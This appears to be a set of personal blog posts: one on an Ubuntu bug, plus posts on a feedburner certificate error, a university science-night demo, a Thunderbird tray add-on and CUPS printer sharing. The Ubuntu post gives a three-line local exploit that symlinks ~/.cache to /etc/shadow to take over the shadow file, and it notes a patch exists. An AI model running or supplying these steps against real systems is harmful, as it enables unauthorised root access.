binfalse

Ubuntu, you all should know, isn’t my preferred operating system. It’s very nice for linux beginners and may decrease some manual work at private machines, but when I’ve heard about the actual bug I’m very confused why we still have to use Ubuntu in our PC pools and why some work groups are emphatic about this system and why we have to administrate their server and local machines with Ubuntu.

I’m still wondering why simple users in Ubuntu systems can out of the box read all log files or the shadow.. That is not that kind of security I’m dreaming about ;)

The actual bug is very simple (via):

rm -rf ~/.cache
ln -s /etc/shadow ~/.cache
ssh localhost

Now you’ve owned the shadow file and you are able to modify roots pass phrase! It’s just too easy…

By the way I tried it by myself and got a funny message:

mscharm@SERVER ~ % ssh localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
aa:bb:cc:dd:ee:ff:gg:hh:ii:jj:kk:ll:mm:nn:oo:pp.
Please contact your system administrator.
Add correct host key in /homes/mscharm/.ssh/known_hosts to get rid of this message.
Offending key in /homes/mscharm/.ssh/known_hosts:10
RSA host key for localhost has changed and you have requested strict checking.
Host key verification failed.
255 mscharm@SERVER ~ %

And my friend Rumpel also tried this exploit and after lunch I just heard him saying

fuck, bolted out, by my self...

not able to disable his screensaver. Maybe he changed a little bit to much in his shadow file!? ;)

Fortunately the patch is released, so have a lot of fun while updating your systems. You should reboot after the update, otherwise the bug is still enabled…

The last few days my feeds were out of date. I manage them with Google’s solution called feedburner, you may have recognized it.

It seems that the developer of this project changed some stuff, anyway, they did not actualize my feeds. The last days (or weeks) I did not had the time to care about, but today I found some minutes.

When I tried to resync my feeds manually I got this nice red error (see also the picture):

There is an issue that must be addressed with your source feed for the feed "binfalse" sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target

This is caused by my Apache redirect directive that redirects all visitors looking for an insecure URL at port 80 to my SSL encrypted content at port 443:

<virtualhost *:80>
...
        Redirect / /
...
</virtualhost>

So you see I’m caring about security ;)

This method works for a long time, but now feedburner tries to verify the certs and because of a lack of money I signed my certs by myself. So feedburner denies the access and doesn’t reread my own feeds to update its database. To repair this problem I’m just redirecting my real content and not the feeds, so feedburner is happy and why should I care about the secure connection of feedburner to my site..

Nevertheless it is not my preferred solution.

Before anyone thinks I’m hibernating, I’ve just soo much to do, so there is no time to maintain this blog… Just don’t know what to do first.

This week I had a presentation, topic was “Modeling of Overflow Metabolism in Batch and Fed-Batch Cultures of Escherichia coli”. I also had to submit a study, with the headline “Modeling and evaluation of the dynamic behavior of a fermentation by simulation”, that among others analyzes the dependencies of the ratio of product concentration versus biomass concentration on biological parameters. Additionally this week I finished a work for a friend at the Otto-von-Guericke-Universität Magdeburg. He has to evaluate x-rays taken at a new detector and I developed a tool that does the trick.

As if that were not enough time consuming I’m still working on my project work, next week I have to present it in a research seminar (fortunately in German).

The reason I write this article, tomorrow is the so called Lange Nacht der Wissenschaften (translated by Google: Long Night of Science). Here the different departments of the university are presenting what they are doing, comprehensible for the public. In this event we have also a slot dealing with SUN Spots where I’m presenting some cool stuff I’ve programmed. Planed are a some introductions what Spots are and what they can do, and of course some demos. Among others we are playing with the light sensor and visualize a sunrise and a sunset, we demonstrate how one can regulate a fan depending on the temperature measured with a Spot (to induce a higher temperature a candle is planed, I hope everything will be well and the Spot won’t melt away!). Of course some basic demos are shown, like AirText or the BouncingDemo, and last but not least it is time to play. I have prepared a labyrinth that has to be solved by various people against each other (up to seven people at a time in the same labyrinth, just limited by the number of available Spots), and also I also developed a control system for the game Blobby Volley to navigate the Blobbies with a Spot, maybe you’ve heard about it ;) We also wanted to build a little car to drive around a little bit, but I’m not such engineer so this car isn’t finished…

If you are bored and don’t know what to do tomorrow visit this presentation!! It’s at 8.30 am in room 3.31 at the Von-Seckendorff-Platz 1.

Maybe I publish all the code when there is a little bit time to write some comments and how-to’s.

So you see, I’m very busy at the moment. If anyone has nothing to do, just notify me, I’ll give you something to work on!

Til version 3 of Thunderbird, or more exactly icedove, I used the add-on New Mail Icon to free the busy space in task list that the Thunderbird process uses even though I have this window very rarely in foreground. But it seems that there is no further development in this project, so this software isn’t compatible to the actual major release…

On my main desktop I thought I have to live with that, but on my notebook screen there is a lack of space, more than ever, so I had to search for an alternative tool. On my way I found a tool (no add-on) called AllTray, it’s available in the Debian/Ubuntu repository. That can dock any window to your tray, so it doesn’t depend on Thunderbird, you can also dock a terminal or your editor or even a complete (Oracle VM) VirtualBox instance.

For my Thunderbird problem it’s a half of the solution, because this tool doesn’t tell me whether there are unread mails. But after some more research I found a real add-on called FireTray that does the desired trick. So more space for other junk ;-)

I have an old printer, an HP Laserjet 6P. It is very reliable and fast, so no need to buy a new one. But there is a problem (I thought), this printer has no network interface, it is connected with a parallel port to my host. Some minutes ago I racked my head how to use this printer with my notebook. Now I’m wondering how easy it is using cups!!

On the server side (the machine that is connected to the printer) you just have to modify this printer and check the field called “Share This Printer”, and in the administration tab just enable “Share printers connected to this system” and “Allow printing from the Internet”.

On your client you only have to publish your server. To do it for the complete system write the following line in your /etc/cups/client.conf , to set this server only for your local user account write it to your users $HOME/.cups/client.conf :

ServerName SERVER:PORT

You just have to specify the port if your server is not listening on the default port 631.

That’s it! Open a document and try to print! I still cannot believe that it is that easy ;)

Thanks to the cups-team